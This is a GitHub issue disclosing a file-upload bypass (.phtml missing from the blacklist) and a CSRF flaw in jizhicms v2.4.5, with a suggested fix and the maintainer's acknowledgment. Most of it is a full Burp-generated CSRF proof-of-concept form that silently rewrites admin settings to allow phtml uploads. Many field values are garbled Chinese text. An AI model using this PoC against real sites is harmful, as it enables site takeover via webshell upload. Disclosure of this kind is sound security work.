jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

1y0ng · 2023-02-24T14:08:21Z

The file upload vulnerability file address:
\app\admin\c\CommonController.php
It can be seen that uploads uses the blacklist and whitelist verification method for the suffix of uploaded files, but the blacklist lacks the restriction on the suffix phtml, which causes the file upload suffix to be bypassed
For users who have logged in to the background, you can add a phtml to the file suffix in the whitelist, and then you can upload a sentence of the suffix phtml Trojan Horse

Visible file uploaded successfully and returned to the upload path

Repair method:Blacklist phtml files

The CSRF vulnerability ：
After the administrator logged in, open the following page phtml will be included in the white list, and other configuration items can also be modified

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
      <input type="hidden" name="web&#95;name" value="�&#158;&#129;�&#135;&#180;CMS�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;keyword" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;&#44;cms&#44;�&#188;&#128;�&#144;cms&#44;�&#133;&#141;�&#180;&#185;cms&#44;cms�&#179;&#187;�&#187;&#159;&#44;phpcms&#44;�&#133;&#141;�&#180;&#185;�&#188;&#129;�&#184;&#154;�&#187;��&#171;&#153;&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#188;&#129;�&#184;&#154;cms&#44;jizhicms&#44;�&#158;&#129;�&#135;&#180;cms&#44;�&#187;��&#171;&#153;cms&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#158;&#129;�&#135;&#180;�&#141;&#154;�&#174;&#162;&#44;�&#158;&#129;�&#135;&#180;blog&#44;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;desc" value="�&#158;&#129;�&#135;&#180;CMS�&#152;&#175;�&#188;&#128;�&#144;�&#133;&#141;�&#180;&#185;�&#154;&#132;PHPCMS�&#189;&#145;�&#171;&#153;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;�&#188;&#140;�&#151;&#160;�&#149;&#134;�&#184;&#154;�&#142;&#136;�&#157;&#131;�&#188;&#140;�&#174;&#128;�&#141;&#149;�&#152;&#147;�&#148;&#168;�&#188;&#140;�&#143;&#144;�&#190;&#155;�&#184;&#176;�&#175;&#140;�&#154;&#132;�&#143;&#146;�&#187;&#182;�&#188;&#140;�&#184;&#174;�&#130;&#168;�&#174;&#158;�&#142;&#176;�&#155;&#182;�&#159;��&#161;&#128;�&#144;&#173;�&#187;��&#184;&#141;�&#144;&#140;�&#177;&#187;�&#158;&#139;�&#189;&#145;�&#171;&#153;�&#188;&#136;�&#188;&#129;�&#184;&#154;�&#171;&#153;�&#188;&#140;�&#151;&#168;�&#136;&#183;�&#171;&#153;�&#188;&#140;�&#184;�人�&#141;&#154;�&#174;&#162;�&#171;&#153;�&#173;&#137;�&#188;&#137;�&#188;&#140;�&#152;&#175;�&#130;&#168;�&#187;��&#171;&#153;�&#154;&#132;�&#165;&#189;�&#184;&#174;�&#137;&#139;�&#128;&#130;�&#158;&#129;�&#128;&#159;�&#187;��&#171;&#153;�&#188;&#140;�&#176;&#177;�&#128;&#137;�&#158;&#129;�&#135;&#180;CMS�&#128;&#130;" />
      <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" />
      <input type="hidden" name="web&#95;beian" value="�&#134;&#128;ICP�&#164;&#135;88888�&#143;&#183;" />
      <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" />
      <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" />
      <input type="hidden" name="web&#95;qq" value="12345678" />
      <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="web&#95;address" value="�&#178;&#179;�&#140;&#151;�&#156;&#129;�&#187;&#138;�&#157;&#138;�&#184;&#130;�&#185;&#191;�&#152;&#179;�&#140;�xxx�&#164;&#167;�&#142;&#166;xx�&#165;&#188;001�&#143;&#183;" />
      <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="domain" value="" />
      <input type="hidden" name="mingan" value="" />
      <input type="hidden" name="closeweb" value="0" />
      <input type="hidden" name="closetip" value="�&#138;&#177;�&#173;&#137;�&#188;&#129;�&#175;&#165;�&#171;&#153;�&#130;&#185;�&#183;&#178;�&#187;&#143;�&#162;&#171;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#129;&#156;�&#173;&#162;�&#191;&#144;�&#161;&#140;�&#188;&#140;�&#175;&#183;�&#129;&#148;�&#179;&#187;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#134;�&#167;&#163;�&#175;&#166;�&#131;&#133;�&#188;&#129;" />
      <input type="hidden" name="web&#95;phone" value="0" />
      <input type="hidden" name="web&#95;weixin" value="" />
      <input type="hidden" name="pc&#95;template" value="cms" />
      <input type="hidden" name="wap&#95;template" value="cms" />
      <input type="hidden" name="weixin&#95;template" value="cms" />
      <input type="hidden" name="iswap" value="1" />
      <input type="hidden" name="isopenhomeupload" value="1" />
      <input type="hidden" name="isopenhomepower" value="0" />
      <input type="hidden" name="cache&#95;time" value="0" />
      <input type="hidden" name="fileSize" value="0" />
      <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" />
      <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#44;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" />
      <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" />
      <input type="hidden" name="classtypemaxlevel" value="0" />
      <input type="hidden" name="onlyuserupload" value="1" />
      <input type="hidden" name="imagequlity" value="75" />
      <input type="hidden" name="ispngcompress" value="0" />
      <input type="hidden" name="admintpl" value="default" />
      <input type="hidden" name="islevelurl" value="0" />
      <input type="hidden" name="iscachepage" value="1" />
      <input type="hidden" name="isautohtml" value="0" />
      <input type="hidden" name="pc&#95;html" value="&#47;" />
      <input type="hidden" name="mobile&#95;html" value="m" />
      <input type="hidden" name="autocheckmessage" value="0" />
      <input type="hidden" name="autocheckcomment" value="1" />
      <input type="hidden" name="iswatermark" value="0" />
      <input type="hidden" name="watermark&#95;file" value="" />
      <input type="hidden" name="watermark&#95;t" value="9" />
      <input type="hidden" name="watermark&#95;tm" value="0" />
      <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="isajax" value="0" />
      <input type="hidden" name="isregister" value="1" />
      <input type="hidden" name="onlyinvite" value="0" />
      <input type="hidden" name="release&#95;table" value="article&#124;product" />
      <input type="hidden" name="closehomevercode" value="0" />
      <input type="hidden" name="closeadminvercode" value="0" />
      <input type="hidden" name="tag&#95;table" value="article&#124;product" />
      <input type="hidden" name="isdebug" value="1" />
      <input type="hidden" name="closesession" value="0" />
      <input type="hidden" name="messageyzm" value="1" />
      <input type="hidden" name="homerelease" value="1" />
      <input type="hidden" name="hideclasspath" value="0" />
      <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" />
      <input type="hidden" name="cachefilenum" value="100" />
      <input type="hidden" name="search&#95;table" value="article&#124;product" />
      <input type="hidden" name="search&#95;words" value="title" />
      <input type="hidden" name="search&#95;words&#95;muti" value="title" />
      <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" />
      <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" />
      <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" />
      <input type="hidden" name="email&#95;port" value="465" />
      <input type="hidden" name="shou&#95;email" value="" />
      <input type="hidden" name="send&#95;email" value="" />
      <input type="hidden" name="send&#95;pass" value="" />
      <input type="hidden" name="send&#95;name" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="tj&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#187;&#143;�&#148;&#182;�&#136;&#176;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#129;�&#175;&#183;�&#149;&#153;�&#132;&#143;�&#130;&#168;�&#154;&#132;�&#148;��&#173;&#144;�&#130;&#174;�&#187;&#182;�&#187;&#165;�&#142;&#183;�&#190;&#151;�&#156;&#128;�&#150;&#176;�&#182;&#136;�&#129;&#175;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#188;&#129;" />
      <input type="hidden" name="send&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#161;&#174;�&#174;&#164;�&#134;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#140;�&#175;&#183;�&#142;3�&#151;&#165;�&#134;&#133;�&#177;&#135;�&#172;&#190;�&#188;&#140;�&#128;&#190;�&#156;&#159;�&#129;&#149;�&#184;&#141;�&#191;&#157;�&#149;&#153;�&#188;&#140;�&#184;&#141;�&#190;&#191;�&#175;&#183;�&#167;&#129;�&#176;&#133;�&#128;&#130;�&#177;&#135;�&#172;&#190;�&#174;&#140;�&#136;&#144;�&#144;&#142;�&#188;&#140;�&#131;&#166;�&#175;&#183;�&#145;&#138;�&#159;&#165;�&#174;&#162;�&#156;&#141;人�&#145;&#152;�&#130;&#168;�&#154;&#132;�&#164;�&#152;&#147;�&#180;&#166;�&#143;&#183;�&#144;&#142;�&#148;�&#189;&#141;�&#188;&#140;�&#141;&#179;�&#174;&#140;�&#136;&#144;�&#184;&#139;�&#141;&#149;�&#137;&#139;�&#187;&#173;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#128;&#130;" />
      <input type="hidden" name="yunfei" value="0&#46;00" />
      <input type="hidden" name="overtime" value="4" />
      <input type="hidden" name="isopenemail" value="1" />
      <input type="hidden" name="paytype" value="0" />
      <input type="hidden" name="alipay&#95;partner" value="" />
      <input type="hidden" name="alipay&#95;key" value="" />
      <input type="hidden" name="alipay&#95;private&#95;key" value="" />
      <input type="hidden" name="alipay&#95;public&#95;key" value="" />
      <input type="hidden" name="wx&#95;mchid" value="" />
      <input type="hidden" name="wx&#95;key" value="" />
      <input type="hidden" name="wx&#95;appid" value="" />
      <input type="hidden" name="wx&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;client&#95;cert" value="" />
      <input type="hidden" name="wx&#95;client&#95;key" value="" />
      <input type="hidden" name="wx&#95;token" value="" />
      <input type="hidden" name="money&#95;exchange" value="1" />
      <input type="hidden" name="jifen&#95;exchange" value="100" />
      <input type="hidden" name="isopenjifen" value="1" />
      <input type="hidden" name="isopenqianbao" value="1" />
      <input type="hidden" name="isopenweixin" value="1" />
      <input type="hidden" name="isopenzfb" value="1" />
      <input type="hidden" name="isopendmf" value="1" />
      <input type="hidden" name="wx&#95;login&#95;appid" value="" />
      <input type="hidden" name="wx&#95;login&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;login&#95;token" value="" />
      <input type="hidden" name="huanying" value="�&#172;&#162;�&#191;&#142;�&#133;&#179;�&#179;&#168;�&#133;&#172;�&#188;&#151;�&#143;&#183;&#126;" />
      <input type="hidden" name="login&#95;award" value="1" />
      <input type="hidden" name="login&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award" value="1" />
      <input type="hidden" name="release&#95;max&#95;award" value="0" />
      <input type="hidden" name="collect&#95;award&#95;open" value="1" />
      <input type="hidden" name="collect&#95;award" value="1" />
      <input type="hidden" name="collect&#95;max&#95;award" value="1000" />
      <input type="hidden" name="likes&#95;award&#95;open" value="1" />
      <input type="hidden" name="likes&#95;award" value="1" />
      <input type="hidden" name="likes&#95;max&#95;award" value="1000" />
      <input type="hidden" name="comment&#95;award&#95;open" value="1" />
      <input type="hidden" name="comment&#95;award" value="1" />
      <input type="hidden" name="comment&#95;max&#95;award" value="1000" />
      <input type="hidden" name="follow&#95;award&#95;open" value="1" />
      <input type="hidden" name="follow&#95;award" value="1" />
      <input type="hidden" name="follow&#95;max&#95;award" value="1000" />
      <input type="hidden" name="invite&#95;award&#95;open" value="0" />
      <input type="hidden" name="invite&#95;type" value="jifen" />
      <input type="hidden" name="invite&#95;award" value="0" />
      <input type="hidden" name="custom&#95;type" value="0" />
      <input type="hidden" name="custom&#95;title" value="" />
      <input type="hidden" name="custom&#95;fields" value="" />
      <input type="hidden" name="custom&#95;ctype" value="1" />
      <input type="hidden" name="custom&#95;tips" value="" />
      <input type="hidden" name="custom&#95;config" value="" />
      <input type="hidden" name="custom&#95;new&#95;title" value="" />
      <input type="hidden" name="custom&#95;new&#95;fields" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

Cherry-toto · 2023-02-24T14:16:23Z

Thank you very much. I will fix this vulnerability in the next version.

Cherry-toto closed this as completed Feb 24, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

1y0ng commented Feb 24, 2023

Cherry-toto commented Feb 24, 2023

jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability #85

Comments

1y0ng commented Feb 24, 2023

Cherry-toto commented Feb 24, 2023